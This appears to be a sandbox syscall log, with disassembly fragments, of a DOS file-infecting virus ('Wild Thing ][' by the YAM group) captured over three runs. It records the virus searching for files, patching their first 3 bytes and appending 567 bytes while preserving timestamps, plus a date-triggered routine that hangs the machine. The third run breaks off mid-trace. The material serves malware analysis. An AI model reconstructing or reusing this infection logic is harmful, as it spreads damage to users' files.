2018-12-25T12:42:11.323995371Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:42:11.332672999Z 62 PC: 131ba | Close file
2018-12-25T12:42:11.335039658Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:42:11.336300509Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:42:11.338988008Z 72 PC: 11991 | Allocate memory
2018-12-25T12:42:11.340821287Z 73 PC: 119b2 | Release memory
2018-12-25T12:42:11.342275103Z 72 PC: 119bd | Allocate memory
2018-12-25T12:42:11.344718128Z 73 PC: 119df | Release memory
2018-12-25T12:42:11.34613332Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:42:11.34798038Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:07.444154354Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:07.44682697Z 44 PC: 12b0e | Get time
0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:07.448935127Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:07.451673933Z 42 PC: 12c17 | Get date
0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:07.454170617Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:07.460113655Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:07.470616079Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:07.481315874Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:07.498524284Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:07.505452705Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:07.507141466Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:07.514054759Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:07.515738329Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:07.518669284Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.526653613Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:07.535654863Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:07.537403425Z 62 PC: 12bfc | Close file
2018-12-25T12:42:07.545512564Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:07.557580223Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.560298954Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.56648238Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.576165065Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.582629272Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.584916436Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.591538663Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.59317482Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.610464957Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.61690118Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.633152093Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.635701803Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.647205374Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.657054149Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.660350075Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.666320497Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.676288202Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.689181413Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.691354401Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.698448432Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.70013401Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.703568119Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.705567185Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.714035011Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.716152864Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.723729427Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.737209906Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.743848045Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.750249605Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.765627622Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.772910005Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.775084903Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.782645355Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.784734367Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.788332Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.790298184Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.799995291Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.802137084Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.809926729Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.820648481Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.823851791Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.83032143Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.840945602Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.8480599Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.849710989Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.856405079Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.859264878Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.862138125Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.864089326Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.873380563Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.875111793Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.883300966Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.894385002Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.897067792Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.90666742Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.917686435Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.924518347Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.926240724Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.93351418Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.935274792Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.937860877Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.940277502Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.949137937Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.950595474Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.960046441Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.970979427Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.974009396Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.980801515Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.99054186Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.997312399Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.999743816Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.006302904Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.007960659Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.01164452Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.014014677Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.022852787Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.025583905Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.034229394Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.04411483Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.046997015Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.053535789Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.063998104Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.071671389Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.074002696Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.083644704Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.085199732Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.09543504Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.105257878Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.107575428Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:08.11209801Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:08.114407148Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:08.115753107Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-25T12:42:08.124749456Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:07.541930469Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:07.54338097Z 44 PC: 12b0e | Get time
0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:07.545781497Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:07.549008265Z 42 PC: 12c17 | Get date
0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:07.551419795Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:07.559001939Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:07.571392665Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:07.580210497Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:08.208795887Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:08.216587287Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:08.218600245Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:08.228683057Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:08.230651774Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:08.233670373Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.236089273Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:08.245808096Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:08.247869415Z 62 PC: 12bfc | Close file
2018-12-25T12:42:08.258264905Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:08.269216454Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.272281905Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.278809924Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.292102235Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.299933308Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.301900639Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.310747704Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.313019153Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.316398622Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.319542005Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.329805972Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.331736687Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.341482495Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.351045033Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.353689304Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.358560228Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.36788325Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.37533598Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.377344125Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.385325559Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.387260175Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.390550387Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.393422281Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.402543994Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.404620699Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.414471815Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.425641694Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.42913078Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.43692921Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.448563764Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.459788891Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.461982344Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.469672768Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.47161401Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.475223893Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.478268764Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.487819422Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.489910118Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.499539967Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.510728795Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.514061006Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.521640172Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.533640261Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.541342726Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.544012139Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.551680193Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.55353657Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.556974966Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.559994546Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.569318652Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.571331869Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.580782558Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.592176961Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.595260286Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.602382009Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.613451657Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.621326654Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.624007727Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.631432013Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.633347023Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.637497441Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.640002656Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.650111256Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.652364477Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.662472134Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.673654652Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.6769522Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.684264854Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.695360508Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.703170677Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.705699409Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.713162561Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.715023814Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.718830915Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.720820792Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.730551825Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.733128988Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.741958442Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.753247983Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.757064849Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.763781732Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.775602101Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.7898351Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.791645573Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.798767724Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.800760618Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.805612345Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.812312864Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.814962863Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:08.818360546Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:08.819837635Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:08.821005071Z 9 PC: 12ae1 | Display string (String= 'YAM - Youngsters Against McAfee Proudly Presents Wild Thing ][ Programmed by Admiral Bailey ')
2018-12-25T12:42:08.826701428Z 76 PC: 12ae6 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:07.921795835Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:07.92363232Z 44 PC: 12b0e | Get time
0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:07.926725561Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:07.930285391Z 42 PC: 12c17 | Get date
0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:07.933106444Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:07.940879526Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:07.947554113Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:07.953907075Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:08.226660404Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:08.235337827Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:08.237961506Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:08.248424869Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:08.250162663Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:08.253412483Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.263236192Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:08.273363933Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:08.275645065Z 62 PC: 12bfc | Close file
2018-12-25T12:42:08.287254876Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:08.299693819Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.305528201Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.312589917Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.326261714Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.34876545Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.35098809Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.371594672Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.373310202Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.37657089Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.380202178Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.407895843Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.410189009Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.420833531Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.432407909Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.436017171Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.443352781Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.45592773Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.463434131Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.465491699Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.473816516Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.475743099Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.479728027Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.483476581Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.4939647Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.496158137Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.506141824Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.52944009Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.532806105Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.541492692Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.552414382Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.560060728Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.562859079Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.571562136Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.573669456Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.57723602Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.580444324Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.590718852Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.593010711Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.602966562Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.614453082Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.617480793Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.625183532Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.636543846Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.649202018Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.652608995Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.660551109Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.662414735Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.665871848Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.669252741Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.678681203Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.680862281Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.688160516Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.697046422Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.700132718Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.70667921Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.714340929Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.719774138Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.721537774Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.726166598Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.727317432Z 64 PC: 12be1 | Write file or device (See above)
